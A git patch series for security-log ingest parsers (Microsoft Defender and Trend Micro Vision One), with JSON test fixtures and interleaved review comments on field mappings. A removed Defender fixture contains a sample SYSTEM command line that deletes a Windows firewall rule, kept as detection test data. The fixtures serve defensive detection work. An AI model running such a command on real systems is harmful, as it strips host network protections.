\"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "process" 
@@ -19,115 +19,73 @@ "info" ] }, - "@timestamp": "2024-11-08T14:38:51.907372Z", + "@timestamp": "2024-10-22T15:09:44.594155Z", "action": { "properties": { - "AccountSid": "S-1-2-3", - "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "InitiatingProcessFileSize": 145408, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", - "InitiatingProcessVersionInfoInternalFileName": "file", - "InitiatingProcessVersionInfoOriginalFileName": "file.exe", - "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", - "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", - "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessTokenElevation": "TokenElevationTypeDefault", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Network Command Shell", - "ProcessVersionInfoInternalFileName": "processcommand.exe", - "ProcessVersionInfoOriginalFileName": "processcommand.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "10.0.22621.1" + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, "file": { - "directory": "C:\\Windows\\processcommand.exe", + "directory": "/usr/bin/ps", "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" }, - "name": "processcommand.exe", - "size": 82944 + "name": "ps", + "size": 
144632 }, "host": { - "id": "123456789abcdef", - "name": "host.group.local" + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" }, "microsoft": { "defender": { "report": { - "id": "17318" + "id": "67417" } } }, "process": { "args": [ - "HTTP", - "advfirewall", - "delete", - "embedded", - "firewall", - "incoming", - "name=\"program=description=", - "rule", - "server", - "traffic\"" + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" ], - "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", - "name": "processcommand.exe", + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "args": [ - "-Embedding", - "ABCDEF0123456789", - "E", - "Global\\HOST0000" - ], "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" + "status": "Unknown", + "subject_name": "Unknown" }, - "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "executable": "c:\\windows\\file.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "file.exe", - "pid": 10868, - "start": "2024-11-08T14:38:00.674494Z", + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", "user": { - "domain": "account domain", - "id": "S-1-2-3", - "name": "syst\u00e8me" - }, - "working_directory": "c:\\windows" + "domain": "computer", + "name": "root" + } }, - "pid": 4520, - "start": "2024-11-08T14:38:51.903048Z", - "working_directory": "C:\\Windows" + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "working_directory": "/usr/bin" }, "related": { "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", - 
"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + "098f6bcd4621d373cade4e832627b4f6", + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", + "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" ], "user": [ - "syst\u00e8me" + "root" ] }, "user": { - "domain": "account domain", - "name": "syst\u00e8me" + "domain": "computer", + "name": "root" } } } \ No newline at end of file From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 28 Nov 2024 14:58:43 +0200 Subject: [PATCH 79/84] Trend Micro Vision One - improve parser --- .../trend-micro-vision-one/_meta/fields.yml | 10 +++ .../trend-micro-vision-one/ingest/parser.yml | 54 +++++++------ .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++ .../tests/test_information_gathering.json | 76 +++++++++++++++++++ .../tests/test_internal_network_scanner.json | 1 + .../tests/test_process.json | 1 + .../tests/test_project_injection.json | 76 +++++++++++++++++++ .../tests/test_registry.json | 1 + .../tests/test_service_abuse.json | 74 ++++++++++++++++++ 9 files changed, 328 insertions(+), 22 deletions(-) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml index f18d3cb5d..2f93f2919 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -1,3 +1,8 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + trendmicro.vision_one.alert_id: description: '' name: trendmicro.vision_one.alert_id 
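Review bot: The expected event pins `file.directory` to `/usr/bin/ps`, which is the file's full path rather than its directory — in this Linux sample the input's `FolderPath` is `/usr/bin/ps` while `process.working_directory` comes out as `/usr/bin`, so if `file.directory` is derived directly from `FolderPath` the fixture is asserting a wrong value rather than catching it. The same fixture shows that the input's `"InitiatingProcessTokenElevation": "None"` and `"ProcessTokenElevation": "None"` yield no `action.properties` keys at all; whether a literal `"None"` string is meant to be dropped or kept deserves a comment in the parser, since here it is a real vendor value and not a null. The JSON document starts before this hunk.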
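Review bot: `action.properties.ScriptBlockText` is declared with `description: ''`; because that name is conventionally associated with PowerShell script-block logging, a one-line description saying it carries the Vision One `objectRawDataStr` indicator (as the parser change in this patch does) would keep rule authors from misreading it. The same applies to `trendmicro.vision_one.detection_name` in the next hunk of this file, although both empty descriptions do match the existing entries. A possible wording: `description: 'Raw data string of the matched indicator (Vision One objectRawDataStr)'`.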
@@ -8,6 +13,11 @@ trendmicro.vision_one.case_id: name: trendmicro.vision_one.case_id type: keyword +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + trendmicro.vision_one.incident_id: description: '' name: trendmicro.vision_one.incident_id diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 09ca7f331..0353bb37b 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
@@ -25,12 +25,13 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" - host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" - user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" - container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" - container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" 
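Review bot: `rule.id: "{{parsed_event.message.model.modelId}}"` (a context line of this hunk) looks up `modelId` under `model`, but in the payload added by this patch `model` is a plain string and `modelId` is its top-level sibling (`"modelId": "dee5c874-…", "model": "Eicar Test File Detection"` in the new EICAR fixture), so the lookup would render empty; `rule.id: "{{parsed_event.message.modelId}}"` matches the data. Separately, the new `host.ip` line renders `.entityValue.ips`, which is a list in that fixture (`["10.0.0.6"]`) — unless the pipeline unwraps list renders, the template yields the list's string form rather than an address, which is worth confirming against the expected output. The `set` stage continues outside the hunk.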
@@ -38,7 +39,7 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" - set: - user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" - set: user.name: "{{final.user.id.split('\\\\') | last}}" 
@@ -46,18 +47,23 @@ stages: filter: "{{final.user.id != null}}" - set: - process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" - process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" 
+ + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" - set: - registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" - registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} 
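Review bot: `process.pid` with `selectattr('field', 'in', ['processPid', 'objectPid']) | first` takes whichever of the two indicators appears first in the payload, not `processPid` preferentially, so precedence silently depends on the vendor's ordering whenever both are present. If `processPid` should win, chain the lookups: `process.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processPid') | first).value or (parsed_event.message.indicators | selectattr('field', '==', 'objectPid') | first).value }}"`; otherwise a comment above the line stating that the order is irrelevant would do. The new `process.parent.pid` and `process.pid` values come from the indicator's `value`, which is presumably a string — confirm that the pipeline coerces it to an integer as ECS expects. The `set` stage begins outside the hunk.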
@@ -68,19 +74,22 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" - set: registry.data.type: "REG_SZ" filter: "{{final.registry.data.strings != null }}" - set: - file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" - file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" - file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" - file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" - set: 
trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" @@ -89,3 +98,4 @@ stages: trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" trendmicro.vision_one.status: "{{parsed_event.message.status}}" trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..5fb30866d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json 
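Review bot: `file.path` now falls back from `objectFilePath` to `fullPath`, but the previous fallback `filePath` has been dropped, so any alert that still carries a `filePath` indicator loses `file.path` after this change; unless `filePath` is known never to occur, `selectattr('field', 'in', ['objectFilePath', 'fullPath', 'filePath'])` keeps it. The hash lookups are also asymmetric: `file.hash.sha1` accepts a generic `fileHash` indicator guarded by `type == 'file_sha1'`, while `file.hash.sha256` still matches only `objectFileHashSha256` — if Vision One emits `fileHash` with type `file_sha256`, the same `type`/`field` filter belongs there too. A short comment above `file.hash.sha1` explaining that `fileHash` needs the `type` guard because it is a generic hash field would help the next reader. The registry `set` stage at the top of the hunk begins outside it.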
@@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": 
\"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, 
\"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": 
[\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json new file mode 100644 index 000000000..4d60422b4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json 
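Review bot: The expected output pins `event.type: ["info"]` and carries no `event.action` or `event.outcome`, although the input's `actResult` indicator states `File quarantined`; the response the product took is lost, which is the first thing an analyst triaging a malware alert looks for. The mapping itself lives in the parser stages outside this patch, but this fixture is the place to pin it once a line such as `event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"` is added. Both new fixtures in this patch (this one and the information-gathering one) are committed without a trailing newline (`\ No newline at end of file`).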
